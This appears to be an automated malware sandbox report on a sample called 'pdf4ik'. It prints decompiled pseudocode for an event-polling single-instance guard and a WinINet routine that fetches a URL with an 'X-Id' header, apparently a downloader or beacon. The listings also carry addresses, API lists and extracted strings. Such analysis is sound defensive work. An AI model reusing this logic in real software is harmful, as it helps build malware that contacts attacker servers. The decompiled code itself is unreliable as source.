29d94e54-29d94e60 call 29dadf3b 1240->1244 1245 29d94e7d-29d94e89 call 29dadf3b 1243->1245 1246 29d94e8c-29d94ea4 1243->1246 1244->1243 1245->1246 1251 29d94eb5-29d94ecd 1246->1251 1252 29d94ea6-29d94eb2 call 29dadf3b 1246->1252 1255 29d94ecf-29d94edb call 29dadf3b 1251->1255 1256 29d94ede-29d94ef6 1251->1256 1252->1251 1255->1256 1259 29d94ef8-29d94f04 call 29dadf3b 1256->1259 1260 29d94f07-29d94f1f 1256->1260 1259->1260 1261 29d94f21-29d94f2d call 29dadf3b 1260->1261 1262 29d94f30-29d94f4b 1260->1262 1261->1262 1267 29d94f4d-29d94f59 call 29dadf3b 1262->1267 1268 29d94f5c-29d94f91 CreateThread Sleep 1262->1268 1267->1268 1268->1160
                                        C-Code - Quality: 77%
                                        			E29D94697() {
				CHAR** _t25;
				CHAR* _t26;
				CHAR* _t28;
				CHAR* _t31;
				void* _t33;
				int _t43;
				void* _t50;
				void* _t55;
				void* _t56;
				void* _t64;

				_t26 =  *_t25;
				lstrcatA(_t55 - 0x3f8, _t26);
				 *(_t55 - 4) = _t43;
				if( *((intOrPtr*)(_t55 - 0x890)) >= _t50) {
					_push( *((intOrPtr*)(_t55 - 0x8a4)));
					E29DADF3B();
					_t56 = _t56 + 4;
				}
				_t28 = E29DA3460(_t43, _t50, _t55 - 0x8a4); // executed
				 *(_t55 - 4) = 2;
				if(_t28[0x14] >= _t50) {
					_t28 =  *_t28;
				}
				lstrcatA(_t55 - 0x3f8, _t28);
				 *(_t55 - 4) = _t43;
				_t60 =  *((intOrPtr*)(_t55 - 0x890)) - _t50;
				if( *((intOrPtr*)(_t55 - 0x890)) >= _t50) {
					_push( *((intOrPtr*)(_t55 - 0x8a4)));
					E29DADF3B();
					_t56 = _t56 + 4;
				}
				_t31 = E29DA2E90(_t55 - 0x7fc, _t60); // executed
				 *(_t55 - 4) = 3;
				if(_t31[0x14] >= _t50) {
					_t31 =  *_t31;
				}
				lstrcatA(_t55 - 0x3f8, _t31);
				 *(_t55 - 4) = _t43;
				if( *((intOrPtr*)(_t55 - 0x7e8)) >= _t50) {
					_push( *(_t55 - 0x7fc));
					E29DADF3B();
				}
				 *((intOrPtr*)(_t55 - 0x7e8)) = 0xf;
				 *(_t55 - 0x7ec) = _t43;
				 *(_t55 - 0x7fc) = _t43;
				_t33 = OpenEventA(0x1f0003, _t43, _t55 - 0x3f8);
				 *0x29dd82f0 = _t33;
				if(_t33 == _t43) {
					L13:
					 *0x29dd82f0 = CreateEventA(_t43, _t43, _t43, _t55 - 0x3f8);
					if(_t64 != 0 && _t64 == 0) {
					}
					E29D93E30(); // executed
				} else {
					do {
						CloseHandle(_t33);
						Sleep(0x1388);
						_t33 = OpenEventA(0x1f0003, _t43, _t55 - 0x3f8);
						 *0x29dd82f0 = _t33;
						_t64 = _t33 - _t43;
					} while (_t64 != 0);
					goto L13;
				}
			}













                                        0x29d94697
                                        0x29d946a1
                                        0x29d946a7
                                        0x29d946b0
                                        0x29d946b8
                                        0x29d946b9
                                        0x29d946be
                                        0x29d946be
                                        0x29d946c7
                                        0x29d946cc
                                        0x29d946d3
                                        0x29d946d5
                                        0x29d946d5
                                        0x29d946df
                                        0x29d946e5
                                        0x29d946e8
                                        0x29d946ee
                                        0x29d946f6
                                        0x29d946f7
                                        0x29d946fc
                                        0x29d946fc
                                        0x29d94705
                                        0x29d9470a
                                        0x29d94711
                                        0x29d94713
                                        0x29d94713
                                        0x29d9471d
                                        0x29d94723
                                        0x29d9472c
                                        0x29d94734
                                        0x29d94735
                                        0x29d9473a
                                        0x29d9474f
                                        0x29d94755
                                        0x29d9475b
                                        0x29d94761
                                        0x29d94767
                                        0x29d9476e
                                        0x29d9479e
                                        0x29d947ae
                                        0x29d947b3
                                        0x29d947b3
                                        0x29d947b8
                                        0x29d94770
                                        0x29d94770
                                        0x29d94771
                                        0x29d9477c
                                        0x29d9478f
                                        0x29d94795
                                        0x29d9479a
                                        0x29d9479a
                                        0x00000000
                                        0x29d94770

                                        APIs
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D946A1
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D946DF
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9471D
                                        • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 29D94761
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 29D94771
                                        • Sleep.KERNEL32(00001388,?,?), ref: 29D9477C
                                        • OpenEventA.KERNEL32(001F0003,?,?,?,?), ref: 29D9478F
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 29D947A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Eventlstrcat$Open$CloseCreateHandleSleep
                                        • String ID: .exe$HTTPA$StdV7$big$com$edit.zip$nalyzer$snow$stone$=>
                                        • API String ID: 3327642776-2641624048
                                        • Opcode ID: 301f855e360905b5f118bd6804fad1d5a7bf259e863be627b75b7b411ce7b91c
                                        • Instruction ID: 9474d2f94d60ff4519cb733505cf8943e3f45d0763579613973a22d545fd3eda
                                        • Opcode Fuzzy Hash: 301f855e360905b5f118bd6804fad1d5a7bf259e863be627b75b7b411ce7b91c
                                        • Instruction Fuzzy Hash: C3426FB1C512A8AADB21EB54CC80ADEBBB8BF55700F04D1EDD18D63602DE345B85DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D91560 Relevance: 39.3, APIs: 15, Strings: 7, Instructions: 841networkfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 72%
                                        			E29D91560(void* __eflags, char* _a4, char* _a8, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, char* _a40, intOrPtr _a60) {
				long _v8;
				char _v16;
				signed int _v20;
				void _v276;
				void _v2276;
				long _v2284;
				long _v2288;
				char* _v2304;
				long _v2312;
				void* _v2316;
				char _v2332;
				intOrPtr _v2340;
				DWORD* _v2344;
				char _v2360;
				long _v2368;
				void* _v2372;
				char* _v2388;
				long _v2396;
				void* _v2400;
				char* _v2416;
				long _v2424;
				DWORD* _v2428;
				char _v2444;
				long _v2452;
				void* _v2456;
				char _v2472;
				long _v2480;
				void* _v2484;
				char _v2500;
				long _v2508;
				void* _v2512;
				char _v2528;
				long _v2536;
				void* _v2540;
				char _v2556;
				intOrPtr _v2564;
				DWORD* _v2568;
				char _v2584;
				long _v2588;
				void* _v2592;
				long _v2596;
				char _v2600;
				char* _v2604;
				void* _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t381;
				signed int _t382;
				void* _t387;
				long _t389;
				void* _t391;
				signed int _t392;
				long _t395;
				char** _t396;
				char** _t407;
				long _t411;
				char** _t413;
				void* _t416;
				char** _t420;
				long _t424;
				char** _t426;
				char** _t431;
				char* _t433;
				char* _t435;
				char* _t437;
				char* _t439;
				short _t440;
				char* _t441;
				signed int _t442;
				intOrPtr _t444;
				char* _t458;
				void* _t459;
				char* _t461;
				void* _t462;
				void* _t464;
				char* _t467;
				int _t469;
				void* _t472;
				int _t487;
				signed int _t488;
				void* _t490;
				int _t493;
				char* _t496;
				void* _t497;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				short _t531;
				void* _t533;
				void* _t534;
				char* _t541;
				char* _t589;
				char* _t590;
				intOrPtr _t593;
				long _t606;
				void* _t607;
				void* _t620;
				void* _t621;
				void* _t626;
				long _t629;
				long _t641;
				char* _t642;
				void* _t644;
				signed int _t647;
				intOrPtr _t648;
				signed int _t655;
				void* _t656;
				void* _t658;
				void* _t659;
				void* _t661;
				void* _t662;

				_t662 = __eflags;
				_push(0xffffffff);
				_push(E29DC290B);
				_push( *[fs:0x0]);
				_t381 =  *0x29dd5664; // 0xd9555f04
				_t382 = _t381 ^ _t655;
				_v20 = _t382;
				_push(_t382);
				 *[fs:0x0] =  &_v16;
				_v2604 = _a4;
				_v2588 = 0;
				_v8 = 1;
				_v2480 = 0xf;
				_v2484 = 0;
				_v2500 = 0;
				E29D892C0( &_v2500, 0x29dcd617, 0);
				_v2368 = 0xf;
				_v2372 = 0;
				_v2388 = 0;
				_v2396 = 0xf;
				_v2400 = 0;
				_v2416 = 0;
				_v2312 = 0xf;
				_v2316 = 0;
				_v2332 = 0;
				_v2508 = 0xf;
				_v2512 = 0;
				_v2528 = 0;
				_v2452 = 0xf;
				_v2456 = 0;
				_v2472 = 0;
				_v2536 = 0xf;
				_v2540 = 0;
				_v2556 = 0;
				_v8 = 8;
				_v2592 = 0;
				_t387 = E29D914B0( &_a8,  &_v2360, _t662,  &_v2360);
				_t658 = _t656 - 0xa20 + 4;
				_v8 = 9;
				E29D891D0(_t387,  &_v2332);
				_v8 = 8;
				if(_v2340 >= 0x10) {
					_push(_v2360);
					E29DADF3B();
					_t658 = _t658 + 4;
				}
				_t626 = _v2316;
				_t606 = 8;
				if(_t626 >= 8) {
					_t389 = 8;
				} else {
					_t606 = _t626;
					_t389 = _t626;
				}
				_t589 = _v2332;
				if(_v2312 < 0x10) {
					_t589 =  &_v2332;
				}
				if(E29D8E7D0(_t389, "https://", _t589) != 0 || _t606 < 8 || (0 | _t606 != 0x00000008) != 0) {
					_t607 = 7;
					__eflags = _t626 - 7;
					if(_t626 >= 7) {
						_t391 = 7;
					} else {
						_t607 = _t626;
						_t391 = _t626;
					}
					__eflags = _v2312 - 0x10;
					_t590 = _v2332;
					if(_v2312 < 0x10) {
						_t590 =  &_v2332;
					}
					_t392 = E29D8E7D0(_t391, "http://", _t590);
					__eflags = _t392;
					if(_t392 == 0) {
						__eflags = _t607 - 7;
						if(_t607 >= 7) {
							_t607 - 7 = _t607 == 7;
							if(_t607 == 7) {
								_v2592 = 7;
							}
						}
					}
				} else {
					_v2592 = 8;
				}
				_v2600 = 0x2f;
				_t395 = E29D95240(_v2592 + 1,  &_v2332,  &_v2600, 1);
				_v2596 = _t395;
				if(_t395 != 0xffffffff) {
					_t396 = E29D951E0(_v2596,  &_v2332,  &_v2444, 0xffffffff);
					_v8 = 0xb;
					_t525 = 2;
				} else {
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
					E29D892C0( &_v2304, 0x29dcd617, 0);
					_t396 =  &_v2304;
					_v8 = 0xa;
					_t525 = 1;
				}
				_v2588 = _t525;
				E29D891D0(_t396,  &_v2388);
				if((_t525 & 0x00000002) != 0) {
					_t525 = _t525 & 0xfffffffd;
					_v2588 = _t525;
					if(_v2424 >= 0x10) {
						_push(_v2444);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
					_v2424 = 0xf;
					_v2428 = 0;
					_v2444 = 0;
				}
				_v8 = 8;
				if((_t525 & 0x00000001) != 0) {
					_t525 = _t525 & 0xfffffffe;
					_v2588 = _t525;
					if(_v2284 >= 0x10) {
						_push(_v2304);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
				}
				_t629 = _v2596;
				_t398 = _v2332;
				_t593 = _v2312;
				_t541 = _v2332;
				if(_t629 == 0xffffffff) {
					__eflags = _t593 - 0x10;
					if(_t593 < 0x10) {
						_t541 =  &_v2332;
					}
					_t542 = _t541 + _v2316;
					__eflags = _t541 + _v2316;
				} else {
					if(_t593 < 0x10) {
						_t541 =  &_v2332;
					}
					_t542 = _t541 + _t629;
				}
				if(_t593 < 0x10) {
					_t398 =  &_v2332;
				}
				_push(_v2608);
				_v2284 = 0xf;
				_v2288 = 0;
				_v2304 = 0;
				E29D95660( &_v2304, _t398 + _v2592, _t542);
				_v8 = 0xc;
				E29D891D0( &_v2304,  &_v2416);
				_v8 = 8;
				if(_v2284 >= 0x10) {
					_push(_v2304);
					E29DADF3B();
					_t658 = _t658 + 4;
				}
				if(E29D95240(0,  &_v2388, "#", 1) == 0xffffffff) {
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
					E29D894C0( &_v2304,  &_v2388, 0, 0xffffffff);
					_t407 =  &_v2304;
					_v8 = 0xe;
					_t526 = _t525 | 0x00000008;
					__eflags = _t526;
				} else {
					_t407 = E29D951E0(0,  &_v2388,  &_v2360, _t404);
					_v8 = 0xd;
					_t526 = _t525 | 0x00000004;
				}
				_v2588 = _t526;
				E29D891D0(_t407,  &_v2388);
				if((_t526 & 0x00000008) != 0) {
					_t526 = _t526 & 0xfffffff7;
					_v2588 = _t526;
					if(_v2284 >= 0x10) {
						_push(_v2304);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
				}
				_v8 = 8;
				if((_t526 & 0x00000004) != 0) {
					_t526 = _t526 & 0xfffffffb;
					_v2588 = _t526;
					if(_v2340 >= 0x10) {
						_push(_v2360);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
				}
				_t411 = E29D95240(0,  &_v2416, ":", 1);
				_v2596 = _t411;
				if(_t411 == 0xffffffff) {
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
					E29D892C0( &_v2304, 0x29dcd617, 0);
					_t413 =  &_v2304;
					_v8 = 0x10;
					_t527 = _t526 | 0x00000020;
					__eflags = _t527;
				} else {
					_t130 = _t411 + 1; // 0x1
					_t413 = E29D951E0(_t130,  &_v2416,  &_v2360, 0xffffffff);
					_v8 = 0xf;
					_t527 = _t526 | 0x00000010;
				}
				_v2588 = _t527;
				E29D891D0(_t413,  &_v2472);
				if((_t527 & 0x00000020) != 0) {
					_t527 = _t527 & 0xffffffdf;
					_v2588 = _t527;
					if(_v2284 >= 0x10) {
						_push(_v2304);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
				}
				_v8 = 8;
				if((_t527 & 0x00000010) != 0) {
					_t527 = _t527 & 0xffffffef;
					_v2588 = _t527;
					if(_v2340 >= 0x10) {
						_push(_v2360);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
				}
				_t415 = _v2596;
				if(_v2596 == 0xffffffff) {
					_t415 = _v2400;
				}
				_t596 =  &_v2416;
				_t416 = E29D951E0(0,  &_v2416,  &_v2360, _t415);
				_v8 = 0x11;
				E29D891D0(_t416,  &_v2416);
				_v8 = 8;
				if(_v2340 >= 0x10) {
					_push(_v2360);
					E29DADF3B();
					_t658 = _t658 + 4;
				}
				_t418 = _v2592;
				if(_v2592 <= 0) {
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
					E29D892C0( &_v2304, 0x29dcd617, 0);
					_t420 =  &_v2304;
					_v8 = 0x13;
					_t528 = _t527 | 0x00000080;
					__eflags = _t528;
				} else {
					_t596 =  &_v2332;
					_t420 = E29D951E0(0,  &_v2332,  &_v2360, _t418 + 0xfffffffd);
					_v8 = 0x12;
					_t528 = _t527 | 0x00000040;
				}
				_v2588 = _t528;
				E29D891D0(_t420,  &_v2528);
				if(_t528 < 0) {
					_t528 = _t528 & 0xffffff7f;
					_v2588 = _t528;
					if(_v2284 >= 0x10) {
						_push(_v2304);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
				}
				_v8 = 8;
				if((_t528 & 0x00000040) != 0) {
					_t528 = _t528 & 0xffffffbf;
					_v2588 = _t528;
					if(_v2340 >= 0x10) {
						_t596 = _v2360;
						_push(_v2360);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
				}
				_t424 = E29D95240(0,  &_v2388, "?", 1);
				_v2596 = _t424;
				if(_t424 == 0xffffffff) {
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
					E29D892C0( &_v2304, 0x29dcd617, 0);
					_t426 =  &_v2304;
					_v8 = 0x15;
					_t529 = _t528 | 0x00000200;
					__eflags = _t529;
				} else {
					_t191 = _t424 + 1; // 0x1
					_t596 =  &_v2388;
					_t426 = E29D951E0(_t191,  &_v2388,  &_v2360, 0xffffffff);
					_v8 = 0x14;
					_t529 = _t528 | 0x00000100;
				}
				_v2588 = _t529;
				E29D891D0(_t426,  &_v2556);
				if((_t529 & 0x00000200) != 0) {
					_t529 = _t529 & 0xfffffdff;
					_v2588 = _t529;
					if(_v2284 >= 0x10) {
						_push(_v2304);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
				}
				_v8 = 8;
				if((_t529 & 0x00000100) != 0) {
					_t529 = _t529 & 0xfffffeff;
					_v2588 = _t529;
					if(_v2340 >= 0x10) {
						_t596 = _v2360;
						_push(_v2360);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
				}
				_t428 = _v2596;
				if(_v2596 == 0xffffffff) {
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
					E29D894C0( &_v2304,  &_v2388, 0, 0xffffffff);
					_t431 =  &_v2304;
					_v8 = 0x17;
					_t530 = _t529 | 0x00000800;
					__eflags = _t530;
				} else {
					_t596 =  &_v2388;
					_t431 = E29D951E0(0,  &_v2388,  &_v2444, _t428);
					_v8 = 0x16;
					_t530 = _t529 | 0x00000400;
				}
				_v2588 = _t530;
				E29D891D0(_t431,  &_v2388);
				if((_t530 & 0x00000800) != 0) {
					_t530 = _t530 & 0xfffff7ff;
					if(_v2284 >= 0x10) {
						_push(_v2304);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
					_v2284 = 0xf;
					_v2288 = 0;
					_v2304 = 0;
				}
				_v8 = 8;
				if((_t530 & 0x00000400) != 0) {
					if(_v2424 >= 0x10) {
						_t596 = _v2444;
						_push(_v2444);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
					_v2424 = 0xf;
					_v2428 = 0;
					_v2444 = 0;
				}
				_t433 = _v2416;
				if(_v2396 < 0x10) {
					_t433 =  &_v2416;
				}
				DeleteUrlCacheEntry(_t433); // executed
				_t435 = _a8;
				if(_a28 < 0x10) {
					_t435 =  &_a8;
				}
				DeleteUrlCacheEntry(_t435); // executed
				if(_a36 == 0) {
					_t437 = _a40;
					__eflags = _a60 - 0x10;
					if(_a60 < 0x10) {
						_t437 =  &_a40;
					}
					_v2592 = InternetOpenA(_t437, 0, 0, 0, 0);
				} else {
					_t496 = E29DA3C40( &_v2444);
					_v8 = 0x18;
					if(_t496[0x14] >= 0x10) {
						_t496 =  *_t496;
					}
					_t497 = InternetOpenA(_t496, 0, 0, 0, 0); // executed
					_v8 = 8;
					_v2592 = _t497;
					if(_v2424 >= 0x10) {
						_push(_v2444);
						E29DADF3B();
						_t658 = _t658 + 4;
					}
					_v2424 = 0xf;
					_v2428 = 0;
					_v2444 = 0;
				}
				_t439 = _v2472;
				if(_v2452 < 0x10) {
					_t439 =  &_v2472;
				}
				_push(_t439);
				_t440 = E29DAEC33();
				_t659 = _t658 + 4;
				_t531 = _t440;
				_t441 = _v2528;
				if(_v2508 < 0x10) {
					_t441 =  &_v2528;
				}
				_t442 =  *0x29dd8550(_t441, "https");
				asm("sbb esi, esi");
				_t641 = ( ~_t442 & 0xff800000) + 0x4800000;
				if(_v2592 == 0) {
					L136:
					_t642 = _v2604;
					 *((intOrPtr*)(_t642 + 0x14)) = 0xf;
					 *(_t642 + 0x10) = 0;
					 *_t642 = 0;
					E29D891D0( &_v2500, _t642);
					__eflags = _v2536 - 0x10;
					if(_v2536 >= 0x10) {
						_t596 = _v2556;
						_push(_v2556);
						E29DADF3B();
						_t659 = _t659 + 4;
					}
					_v2536 = 0xf;
					_v2540 = 0;
					_v2556 = 0;
					__eflags = _v2452 - 0x10;
					if(_v2452 >= 0x10) {
						_push(_v2472);
						E29DADF3B();
						_t659 = _t659 + 4;
					}
					_v2452 = 0xf;
					_v2456 = 0;
					_v2472 = 0;
					__eflags = _v2508 - 0x10;
					if(_v2508 >= 0x10) {
						_push(_v2528);
						E29DADF3B();
						_t659 = _t659 + 4;
					}
					_v2508 = 0xf;
					_v2512 = 0;
					_v2528 = 0;
					__eflags = _v2312 - 0x10;
					if(_v2312 >= 0x10) {
						_t596 = _v2332;
						_push(_v2332);
						E29DADF3B();
						_t659 = _t659 + 4;
					}
					_v2312 = 0xf;
					_v2316 = 0;
					_v2332 = 0;
					__eflags = _v2396 - 0x10;
					if(_v2396 >= 0x10) {
						_push(_v2416);
						E29DADF3B();
						_t659 = _t659 + 4;
					}
					_v2396 = 0xf;
					_v2400 = 0;
					_v2416 = 0;
					__eflags = _v2368 - 0x10;
					if(_v2368 >= 0x10) {
						_push(_v2388);
						E29DADF3B();
						_t659 = _t659 + 4;
					}
					_v2368 = 0xf;
					_v2372 = 0;
					_v2388 = 0;
					__eflags = _v2480 - 0x10;
					if(_v2480 >= 0x10) {
						_t596 = _v2500;
						_push(_v2500);
						E29DADF3B();
						_t659 = _t659 + 4;
					}
					_v2480 = 0xf;
					_v2484 = 0;
					_v2500 = 0;
					__eflags = _a28 - 0x10;
					if(_a28 >= 0x10) {
						_push(_a8);
						E29DADF3B();
						_t659 = _t659 + 4;
					}
					_a28 = 0xf;
					_a24 = 0;
					_a8 = 0;
					__eflags = _a60 - 0x10;
					if(_a60 >= 0x10) {
						_push(_a40);
						E29DADF3B();
					}
					_t444 = _v2604;
					goto L155;
				} else {
					_t458 = _v2416;
					if(_v2396 < 0x10) {
						_t458 =  &_v2416;
					}
					_t556 = _v2592;
					_t459 = InternetConnectA(_v2592, _t458, _t531, 0, 0, 3, _t641, 0); // executed
					_t621 = _t459;
					_v2608 = _t621;
					if(_t621 == 0) {
						L135:
						InternetCloseHandle(_v2592);
						goto L136;
					} else {
						_t461 = _v2388;
						if(_v2368 < 0x10) {
							_t461 =  &_v2388;
						}
						_t462 = HttpOpenRequestA(_t621, "GET", _t461, 0, 0, 0, _t641, 0); // executed
						_t534 = _t462;
						if(_t534 == 0) {
							L134:
							InternetCloseHandle(_t621);
							goto L135;
						} else {
							_t464 = E29D8E880(_t556,  &_v2584);
							_v8 = 0x19;
							E29D89930("X-Id: ",  &_v2304, _t464);
							_t661 = _t659 + 4;
							_v8 = 0x1b;
							if(_v2564 >= 0x10) {
								_push(_v2584);
								E29DADF3B();
								_t661 = _t661 + 4;
							}
							_t467 = _v2304;
							_v2564 = 0xf;
							_v2568 = 0;
							_v2584 = 0;
							if(_v2284 < 0x10) {
								_t467 =  &_v2304;
							}
							HttpAddRequestHeadersA(_t534, _t467, _v2288, 0x20000000);
							_t469 = HttpSendRequestA(_t534, 0, 0, 0, 0); // executed
							_t596 =  &_v2588;
							_t647 = _t469;
							_v2588 = 0x100;
							if(HttpQueryInfoA(_t534, 0x13,  &_v276,  &_v2588, 0) != 0) {
								_push( &_v276);
								_t472 = E29DAEC33();
								_t659 = _t661 + 4;
								__eflags = _t472 - 0xc8;
								if(_t472 != 0xc8) {
									goto L125;
								}
								__eflags = _t647;
								if(_t647 == 0) {
									L133:
									InternetCloseHandle(_t534);
									_v8 = 8;
									E29D89160( &_v2304);
									_t621 = _v2608;
									goto L134;
								}
								_t596 =  &_v2596;
								_t487 = InternetReadFile(_t534,  &_v2276, 0x7cf,  &_v2596); // executed
								__eflags = _t487;
								if(_t487 == 0) {
									goto L133;
								} else {
									goto L129;
								}
								while(1) {
									L129:
									_t488 = _v2596;
									__eflags = _t488;
									if(_t488 == 0) {
										goto L133;
									}
									 *((char*)(_t655 + _t488 - 0x8e0)) = 0;
									_t490 = E29D95460( &_v2360,  &_v2500,  &_v2276); // executed
									_t659 = _t659 + 0xc;
									_v8 = 0x1c;
									E29D891D0(_t490,  &_v2500);
									_v8 = 0x1b;
									__eflags = _v2340 - 0x10;
									if(_v2340 >= 0x10) {
										_push(_v2360);
										E29DADF3B();
										_t659 = _t659 + 4;
									}
									_t596 =  &_v2596;
									_v2340 = 0xf;
									_v2344 = 0;
									_v2360 = 0;
									_t493 = InternetReadFile(_t534,  &_v2276, 0x7cf,  &_v2596); // executed
									__eflags = _t493;
									if(_t493 != 0) {
										continue;
									} else {
										goto L133;
									}
								}
								goto L133;
							} else {
								L125:
								_t648 = _v2604;
								E29D89100(_t648, "ERROR");
								E29D89160( &_v2304);
								E29D89160( &_v2556);
								E29D89160( &_v2472);
								E29D89160( &_v2528);
								E29D89160( &_v2332);
								E29D89160( &_v2416);
								E29D89160( &_v2388);
								E29D89160( &_v2500);
								E29D89160( &_a8);
								E29D89160( &_a40);
								_t444 = _t648;
								L155:
								 *[fs:0x0] = _v16;
								_pop(_t620);
								_pop(_t644);
								_pop(_t533);
								return E29DADF46(_t444, _t533, _v20 ^ _t655, _t596, _t620, _t644);
							}
						}
					}
				}
			}






















































































































                                        0x29d91560
                                        0x29d91563
                                        0x29d91565
                                        0x29d91570
                                        0x29d91577
                                        0x29d9157c
                                        0x29d9157e
                                        0x29d91584
                                        0x29d91588
                                        0x29d91593
                                        0x29d91599
                                        0x29d9159f
                                        0x29d915b7
                                        0x29d915bd
                                        0x29d915c3
                                        0x29d915c9
                                        0x29d915ce
                                        0x29d915d4
                                        0x29d915da
                                        0x29d915e0
                                        0x29d915e6
                                        0x29d915ec
                                        0x29d915f2
                                        0x29d915f8
                                        0x29d915fe
                                        0x29d91604
                                        0x29d9160a
                                        0x29d91610
                                        0x29d91616
                                        0x29d9161c
                                        0x29d91622
                                        0x29d91628
                                        0x29d9162e
                                        0x29d91634
                                        0x29d91644
                                        0x29d91648
                                        0x29d9164e
                                        0x29d91653
                                        0x29d9165e
                                        0x29d91662
                                        0x29d91667
                                        0x29d91672
                                        0x29d9167a
                                        0x29d9167b
                                        0x29d91680
                                        0x29d91680
                                        0x29d91683
                                        0x29d91689
                                        0x29d91690
                                        0x29d91698
                                        0x29d91692
                                        0x29d91692
                                        0x29d91694
                                        0x29d91694
                                        0x29d916a1
                                        0x29d916a7
                                        0x29d916a9
                                        0x29d916a9
                                        0x29d916bb
                                        0x29d916da
                                        0x29d916df
                                        0x29d916e1
                                        0x29d916e9
                                        0x29d916e3
                                        0x29d916e3
                                        0x29d916e5
                                        0x29d916e5
                                        0x29d916eb
                                        0x29d916f2
                                        0x29d916f8
                                        0x29d916fa
                                        0x29d916fa
                                        0x29d91705
                                        0x29d9170a
                                        0x29d9170c
                                        0x29d9170e
                                        0x29d91711
                                        0x29d9171b
                                        0x29d9171d
                                        0x29d9171f
                                        0x29d9171f
                                        0x29d9171d
                                        0x29d91711
                                        0x29d916ce
                                        0x29d916ce
                                        0x29d916ce
                                        0x29d91740
                                        0x29d91747
                                        0x29d9174c
                                        0x29d91755
                                        0x29d917a9
                                        0x29d917ae
                                        0x29d917b5
                                        0x29d91757
                                        0x29d91764
                                        0x29d9176e
                                        0x29d91778
                                        0x29d9177f
                                        0x29d91784
                                        0x29d9178a
                                        0x29d9178e
                                        0x29d9178e
                                        0x29d917c2
                                        0x29d917c8
                                        0x29d917d0
                                        0x29d917d2
                                        0x29d917dc
                                        0x29d917e2
                                        0x29d917ea
                                        0x29d917eb
                                        0x29d917f0
                                        0x29d917f0
                                        0x29d917f3
                                        0x29d917fd
                                        0x29d91807
                                        0x29d91807
                                        0x29d9180e
                                        0x29d91818
                                        0x29d9181a
                                        0x29d91824
                                        0x29d9182a
                                        0x29d91832
                                        0x29d91833
                                        0x29d91838
                                        0x29d91838
                                        0x29d9182a
                                        0x29d9183b
                                        0x29d91841
                                        0x29d91847
                                        0x29d9184d
                                        0x29d91852
                                        0x29d91863
                                        0x29d91866
                                        0x29d91868
                                        0x29d91868
                                        0x29d9186e
                                        0x29d9186e
                                        0x29d91854
                                        0x29d91857
                                        0x29d91859
                                        0x29d91859
                                        0x29d9185f
                                        0x29d9185f
                                        0x29d91877
                                        0x29d91879
                                        0x29d91879
                                        0x29d9188b
                                        0x29d91895
                                        0x29d9189f
                                        0x29d918a9
                                        0x29d918b0
                                        0x29d918c1
                                        0x29d918c5
                                        0x29d918ca
                                        0x29d918d5
                                        0x29d918dd
                                        0x29d918de
                                        0x29d918e3
                                        0x29d918e3
                                        0x29d918fe
                                        0x29d9192e
                                        0x29d91938
                                        0x29d91942
                                        0x29d91949
                                        0x29d9194e
                                        0x29d91954
                                        0x29d9195b
                                        0x29d9195b
                                        0x29d91900
                                        0x29d9190f
                                        0x29d91914
                                        0x29d91918
                                        0x29d91918
                                        0x29d91966
                                        0x29d9196c
                                        0x29d91979
                                        0x29d9197b
                                        0x29d9197e
                                        0x29d9198a
                                        0x29d91992
                                        0x29d91993
                                        0x29d91998
                                        0x29d91998
                                        0x29d9199b
                                        0x29d919a5
                                        0x29d919af
                                        0x29d919af
                                        0x29d919b6
                                        0x29d919c0
                                        0x29d919c2
                                        0x29d919c5
                                        0x29d919d1
                                        0x29d919d9
                                        0x29d919da
                                        0x29d919df
                                        0x29d919df
                                        0x29d919d1
                                        0x29d919f2
                                        0x29d919f7
                                        0x29d91a00
                                        0x29d91a2d
                                        0x29d91a37
                                        0x29d91a41
                                        0x29d91a48
                                        0x29d91a4d
                                        0x29d91a53
                                        0x29d91a56
                                        0x29d91a56
                                        0x29d91a02
                                        0x29d91a04
                                        0x29d91a13
                                        0x29d91a18
                                        0x29d91a1c
                                        0x29d91a1c
                                        0x29d91a61
                                        0x29d91a67
                                        0x29d91a6f
                                        0x29d91a71
                                        0x29d91a7b
                                        0x29d91a81
                                        0x29d91a89
                                        0x29d91a8a
                                        0x29d91a8f
                                        0x29d91a8f
                                        0x29d91a92
                                        0x29d91a9c
                                        0x29d91aa6
                                        0x29d91aa6
                                        0x29d91aad
                                        0x29d91ab7
                                        0x29d91ab9
                                        0x29d91ac3
                                        0x29d91ac9
                                        0x29d91ad1
